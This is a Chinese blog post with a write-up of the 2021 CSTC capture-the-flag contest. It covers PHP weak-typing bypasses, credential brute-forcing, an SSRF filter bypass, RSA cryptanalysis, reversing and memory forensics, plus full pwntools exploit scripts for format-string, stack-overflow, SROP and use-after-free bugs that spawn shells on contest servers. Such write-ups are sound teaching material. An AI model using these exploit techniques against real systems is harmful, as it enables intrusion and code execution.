Skip to content
Menu
0xdawn's blog
  • 首页
  • 关于我
  • 联系方式
0xdawn's blog
2021年5月6日2021年9月22日

2021CSTC write up

Web

easyweb

代码审计弱类型和函数的特性

<?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);//json编码
if(is_array($a)){
   is_numeric(@$a["bar1"])?die("nope"):NULL;//判断是纯数字或数字字符串
   if(@$a["bar1"]){
       ($a["bar1"]>2021)?$v1=1:NULL;//php弱类型绕过
   }
   if(is_array(@$a["bar2"])){
       //需要count($a["bar2"])==5和is_array($a["bar2"][0])有值,是or
       if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
       $pos = array_search("nudt", $a["a2"]);
       //要求有a2,并且值中有字符串“nudt”
       $pos===false?die("nope"):NULL;
       foreach($a["bar2"] as $key=>$val){//循环
              //bar2中不能有字符nudt
           $val==="nudt"?die("nope"):NULL;
       }
       $v2=1;//需要
   }
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
   if(!strcmp($c[1],$d) && $c[1]!==$d){
        //需要同时成立,即$c$d既相等又不相等,通过php弱类型绕过数组和字符串比较返回null
       eregi("3|1|c",$d.$c[0])?die("nope"):NULL;//eregi函数有个%00截断漏洞
       strpos(($c[0].$d), "cstc2021")?$v3=1:NULL;
       //$c[0]和$d连接返回字符串cstc2021的位置
   }
}
if($v1 && $v2 && $v3){
   include "flag.php";
   echo $flag;
}
?>

poc:?foo={"bar1":"2022a","bar2":[[1],2,3,4,5],"a2":"nudt"}&cat[1][]=111&cat[0]=12cstc2021&dog=%00

easyweb2

最开始通过扫描得到了路径swagger-ui.html

然后就经历特别多的测试,最后给了提醒使用token,而token是通过登录来获得的,这里就通过暴力破解了。成功暴力破解出test/test。

在看提示说需要获得管理员的token。然后发现有一个user-controller,那可能是暴力破解出admin用户

成功暴力破解

{"用户ID":"987","用户组":"系统管理员","用户名":"ctf_admin","HASH":"2773d5bd7e1a7a7eec619c6d5fbdfd3a"}

2773d5bd7e1a7a7eec619c6d5fbdfd3a解出为ctfer123!@#

所以ctf_admin/ctfer123!@#,重新登录。

获得管理员Token:9c618e664319512ef7db2d3c0672bee0

然后提示关注/home/index接口,猜一猜肯定是ssrf啦。这里经过fuzz出过滤了file,所以通过双写绕过。

成功获得flag

Crypto

RSA2

由于padding的范围很小,通过小公钥指数攻击估算出e,由于范围很小,e可以视为已知

e_small = gmpy2.iroot(c1,3)[0]
e_big = gmpy2.iroot(c2,3)[0]
if e_small > e_big:
    e_small, e_big = e_big, e_small
start = 20210401
end = 20210505
e_min = e_big - start
e_max = e_small - end
'''
e_min = 53860
e_max = 53957
'''`

因为g = d * (p - 0xdeadbeef),且e已知,同乘e即使在mod n的条件下消去d

又因0xdeadbeef为常数,可以通过构造消去,可以构造出K*p的结构,并对其求公因式则可分解n,并可以同时确定e

for e in range(e_min,e_max):
    kp = pow(2 ,e*g , n) * pow(2 ,0xdeadbeef-1 ,n)
    p =gmpy2.gcd(kp-1 ,n)
    if p != 1:
        break

已知e,n,p则可以分解出q,从而求出d,之后则可以通过常规的rsa解密

EXP

from gmpy2 import *
from Crypto.Util.number import *

c1 = 8321449807360182827125
c2 = 8321441183828895770712
n = 378094963578091245652286477316863605753157432437621367359342302751615833557269627727449548734187939542588641672789504086476494927855747407344197241746889123693358997028141479289459947165818881146467218957546778123656120190207960702225556466771501844979094137868818924556860636212754616730115341674681116573326890134855072314950288530400350483394140781434097516134282100603979066057391672872913866678519235744668652042193736205044674422210689619562242862928626697711582401250962536787125165979017740138070213899305175933585261127763164192929103624167063213758551239415744211455417108907505646457646161227272639379721764779734013149963229002406400371319674194009206372087547010201440035410745572669645666856126204769178179570446069571090298945041726576151255620825221663591127702492882834949100599423704250729752444923956601971323645242934249137015933524911614158989705977723056398299344849153945858516695027157652464450872079484515561281333287781393423326046633891002695625031041881639987758851943448352789469117137668229144914356042850963002345804817204906458653402636643504354041188784842235312540435896510716835069861282548640947135457702591305281493685478066735573429735004662804458309301038827671971059369532684924420835204769329
g = 3976547671387654068675440379770742582328834393823569801056509684207489138919660098684138301408123275651176128285451251938825197867737108706539707501679646427880324173378500002196229085818500327236191128852790859809972892359594650456622821702698053681562517351687421071768373342718445683696079821352735985061279190431410150014034774435138495065087054406766658209697164984912425266716387767166412306023197815823087447774319129788618337421037953552890681638088740575829299105645000980901907848598340665332867294326355124359170946663422578346790893243897779634601920449118724146276125684875494241084873834549503559924080309955659918449396969802766847582242135030406950869122744680405429119205293151092844435803672994194588162737131647334232277272771695918147050954119645545176326227537103852173796780765477933255356289576972974996730437181113962492499106193235475897508453603552823280093173699555893404241432851568898226906720101475266786896663598359735416188575524152248588559911540400610167514239540278528808115749562521853241361159303154308894067690191594265980946451318139963637364985269694659506244498804178767180096195422200695406893459502635969551760301437934119795228790311950304181431019690890246807406970364909654718663130558117158600409638504924084063884521237159579000899800018999156006858972064226744522780397292283123020800063335841101274936236800443981678756303192088585798740821587192495178437647789497048969720110685325336457005611803025549386897596768084757320114036370728368369612925685987251541629902437275412553261624335378768669846356507330025425467339014984330079364067149950238561943275006049728406278318846998650496707162387768801213108565185221147664770009978012050906904959264045050100404522270495606970447076283894255951481388496134870426452215997834228869196114684962261076716651779120620585343304887755029463545328534291186
c = 141187369139586875794438918220657717715220514870544959295835385681523005285553297337947377472083695018833866941104904071675141602626896418932763833978914936423338696805941972488176008847789235165341165167654579559935632669335588215515509707868555632337151209369075754122977694992335834572329418404770856890386340258794368538033844221701815983303376617825048502634692029763947325144731383655217790212434365368739783525966468588173561230342889184462164098771136271291295174064537653917046323835004970992374805340892669139388917208009182786199774133598205168195885718505403022275261429544555286425243213919087106932459624050446925210285141483089853704834315135915923470941314933036149878195756750758161431829674946050069638069700613936541544516511266279533010629117951235494721973976401310026127084399382106355953644368692719167176012496105821942524500275322021731162064919865280000886892952885748100715392787168640391976020424335319116533245350149925458377753639177017915963618589194611242664515022778592976869804635758366938391575005644074599825755031037848000173683679420705548152688851776996799956341789624084512659036333082710714002440815131471901414887867092993548663607084902155933268195361345930120701566170679316074426182579947
start = 20210401
end = 20210505

e_small = iroot(c1,3)[0]
e_big = iroot(c2,3)[0]

if e_small > e_big:
    e_small, e_big = e_big, e_small
assert e_small < e_big
e_min = e_big - end
e_max = e_small - start

'''
e_min = 53860
e_max = 53957
'''

for e in range(e_min,e_max):
    kp = pow(2 ,e*g , n) * pow(2 ,0xdeadbeef-1 ,n)
    p = gcd(kp-1 ,n)
    if p != 1:
        break

q = n // p
print(long_to_bytes(pow(c,invert(e,(q-1) * (p-1)),n)))

Re

free_flag

首先反编译,可以知道关心的应该是Pin的值

找到对Pin进行了引用的地方,异或

image-20210505215117770

找到byte_B98数组的值,异或一下12

#include <stdio.h>

unsigned char ida_chars[] =
{
  120, 100,  63,  83, 109, 121, 120, 100,  98,  63, 
  120,  61, 111,  56,  61, 120,  60,  98,  83,  57, 
  117,  57, 120,  63,  97,  83,  61,  57,  83,  98, 
   60, 120,  83,  60,  57,  83,  57,  63, 111, 121, 
  126,  63, 10
};

int main()
{
    int i;

    for(i = 0; i < sizeof(ida_chars); i++)
        putchar(ida_chars[i]^0xc);
} 

crackme

逆向菜鸡做这个绕了个大圈。。。

胡乱找了很久,找到关键代码,然后慢慢看了很久的算法。。

开始是一个长度判断

然后算法,看了很久,感觉复杂啊

image-20210505220830102

上面折磨了很久,然后就去看了看第二部分计算,艹,马上就没做计算,直接比较,那我之前看的第一部算法,不用管啊。。。。

image-20210505221308965

最后,我单步调试一个一个得到计算完的值,再md5,完事

ck

感觉,这个题碰运气,哈哈哈

ida反编译后直接搜索字符串

image-20210505222141639

第一个字符串就很可疑,

然后直接x,找字符串引用,发现新天地

image-20210505222250175

这不是base64加密嘛,从 = 也可以猜想

所以这就是一个换表base64嘛

简单:

import base64

s = ",.0fgWV#`/1Heox$~\"2dity%_;j3csz^+@{4bKrA&=}5laqB*-[69mpC()]78ndu"
print(len(s))
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
enc = 'ef"^sVK@3r@Ke4e6%6`)'
ans = enc.translate(str.maketrans(s, table))

print(base64.b64decode(ans))

得到:04_tianhe233_29。

md5,得到flag

maze

迷宫题

没有什么坑,还给了游戏熟悉的aswd,贴心

让程序跑起来,然后提取出数据,C语言中打印成7*7规模,最后手走一下即可,当然要写搜索算法来跑感觉也行,锻炼一下 hahhah,赛后尝试一下

#include <stdio.h>

unsigned int data[49] = {
    0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 
    0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 
    0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 
    0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 
    0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 
    0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 
    0x00000001
};

int main(void)
{
    int i, j; 

    for(i = 0; i < 7; i++)
    {
        for(j = 0; j < 7; j++)
        {
            printf("%d ", data[7*i+j]);
        }
        putchar(10);
    }
}

终点就是最后一个点!

image-20210505223314899

ssddwdwdddssaasasaaassddddwdds

再md5一下得到flag。

Misc

RGB

找到了类似的题https://www.cnblogs.com/webFuckeeeer/p/4536776.html

顺着来就可以做出来

通过图片size分解了一下:176和164比较合适

#-*- coding:utf-8 -*-
from PIL import Image
import re

x = 503 #x坐标  通过对txt里的行数进行整数分解
y = 122 #y坐标  x*y = 行数

im = Image.new("RGB",(x,y))#创建图片
file = open('misc100.txt') #打开rbg值文件

#通过一个个rgb点生成图片
for i in range(0,x):
    for j in range(0,y):
        line = file.readline()#获取一行
        rgb = line.split(",")#分离rgb
        im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))#rgb转化为像素
im.show()

zip

有个加密的压缩包,没有任何提示.一点点爆破出来的密码是ff123

出来一个加密的docx文件,无法爆破.

还有一个readme.txt文档,里面好像是培根密码

解密docx,直接strings命令发现flag

memory1

vmem搜了一下常用volatility进行取证

由于我kali是2020版,就只能在powershell里操作了

先确定imageinfo

再用pstree找相关的进程

找到一个后门metsvc.exe,看是谁调用的:

cmdline参数:

metsvc.exe pid:   1908                                                                                                  ************************************************************************                 metsvc.exe pid:    400                                                                   Command line : "C:\Windows\TEMP\cybSAbYRflAvhz\metsvc.exe" service                                                      ************************************************************************                 metsvc-server. pid:   1912                                                                                              ************************************************************************                 cscript.exe pid:   1472                                                                   Command line : cscript "C:\Windows\TEMP\UEAOGWBdwyydm.vbs"                                                                      

image-20210505222631877

这个vbs就很像了,试了一下确实正确

Pwn

bank

密码为随机值,若密码第一个字节为'\x00'时,若我们输入为'\x00',则两个相等,所以输入'\x00',成功几率为1 /256,在通过格式化字符串漏洞将堆中的flag打印出来即可。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'bank'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10000"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    p = 'A'
    sla(':', p)
    sl('\x00')
    ru('?')
    sl('yes')
    #db()
    sl('%8$s')

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    for i in range(255):
        try:
            if LOCAL:
                elf = ELF(elf_path)
                if LIBC:
                    libc = ELF(libc_path)
                io = elf.process()
            else:
                elf = ELF(elf_path)
                io = remote(host.split(':')[0], int(host.split(':')[1]))
                if LIBC:
                    libc = ELF(libc_path)
            exploit()
            finish()
        except:
            continue

auto

先采用angr来 fuzz找到进入login_again函数的输入

angr脚本如下:

import angr
from binascii import b2a_hex
import logging
import sys
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./auto')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x0804867E) # call login_again
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

login_again就是个堆栈溢出了,留有后面,直接跳到后门函数。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'auto'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10001"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    # 55 58 59 55 4b 56 4e 5a
    p = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
    s(p)
    #db()
    p = b'\x00' * 0x48
    p += p32(0x0)
    p += p32(0x08048665)
    sl(p)

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

small

采用srop进行构造出execve("/bin/sh", 0, 0)拿 shell

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

elf_path  = 'small'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10002"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    syscall_ret = 0x40100A
    vul_addr  = 0x40100D 
    bss = elf.bss() + 0x100

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_read
    sigframe.rdi = 0
    sigframe.rsi = bss
    sigframe.rdx = 0x200
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'\x11' * 0x18 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    s(p)

    # set rax=15 and call sigreturn
    sleep(0.1)
    p = b'\x00' * 15
    s(p)

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_execve
    sigframe.rdi = bss  # "/bin/sh" 's addr
    sigframe.rsi = 0x0
    sigframe.rdx = 0x0
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'/bin/sh\x00' + b'\x00' * 0x10 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    sleep(0.1)
    s(p)

    # call sigreturn
    p = b'\x00' * 15
    #db()
    sleep(0.1)
    s(p)

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

paper

uaf漏洞,开辟堆块到v8 - 8处,修改v9值为0xcccccccc拿shell。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'paper'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10003"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad():
    sla('>', '1')

def rm(idx):
    sla('>', '2')
    sla(':', str(idx))

def wt(idx, n):
    sla('>', '3')
    sla(':', str(idx))
    sla(':', str(n))

def fd():
    sla('>', '4')

def mv(idx):
    sla('>', '5')
    sla('?', str(idx))

def sh():
    sla('>', '6')

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    ad()
    rm(0)
    fd()
    ru('0x')
    v8 = int(r(12), 16)
    li('v8: ' + hex(v8))
    mv(0x21)
    wt(0, v8 - 8)
    ad() # 1
    ad() # 2
    wt(2, 0xCCCCCCCC)
    sh()
    #db()

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

managebooks

漏洞为uaf,在打印Summary函数中,采用函数指针调用,修改该函数指针,即可劫持rip,先泄漏libc,再调用system即可。

exp

#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'managebooks'
libc_path = '/glibc/2.27/64/lib/libc.so.6'

# remote server ip and port
host = "81.70.195.166:10004"

# if local debug
LOCAL = 0
LIBC  = 1
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad(name_sz, name, data_sz, data):
    sla('>>', '1')
    sla(':', str(name_sz))
    sa(':', name)
    sla(':', str(data_sz))
    sa(':', data)

def rm(idx):
    sla('>>', '2')
    sla(':', str(idx))

def ch(idx, sz, data):
    sla('>>', '3')
    sla(':', str(idx))
    sla(':', str(sz))
    sa(':', data)
def rd(idx):
    sla('>>', '4')
    sla(':', str(idx))
#--------------------------exploit--------------------------
def exploit():
    bookcase = 0x6020C0
    li('exploit...')
    ad(0x10, 'AAAA', 0x500, 'bbbb')
    rm(0)
    rm(0)
    ch(0, 0x80, '\x10') # free sum and alloc

    ad(0x10, p64(elf.plt['puts']), 0x30, '/bin/sh\x00') # 1

    '''
    rm(0)
    #ad(0x10, p64(bookcase), 0x20, 'bbbb')
    '''

    rd(0) # leak libc
    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - libc.sym['__malloc_hook'] - 976 - 0x10
    li('libc_base: ' + hex(libc_base))

    rm(1)
    rm(1)

    ad(0x10, p64(libc_base + libc.sym['system']), 0x30, '\x00') # 1
    #db()
    rd(1) # call system

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        libc_path = './libc.so.6'
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

  有时候,禁锢我们的,不是环境设下的牢笼,不是他人施与的压力,而是我们自己把自己局限在狭隘的空间里,在无端中迷失了自我.

云烟成雨

https://www.0xdawn.cn/wp-content/uploads/2019/11/房东的猫-云烟成雨.mp3

文章检索

分类

  • CTF
  • 代码审计
  • 学习笔记
  • 渗透测试
  • 漏洞演练

近期文章

  • 2021长城杯 Write up by D0g3
  • 2021网刃杯 write up
  • 2021羊城杯 Web Write up
  • 第五届蓝帽杯总决赛 write up
  • 第五届强网杯Web部分 write up

归档

联系我们

地址
成都信息工程大学

Email
yan@0xdawn.cn

QQ
1115230222

©2022 0xdawn's blog | Powered by WordPress and Superb Themes!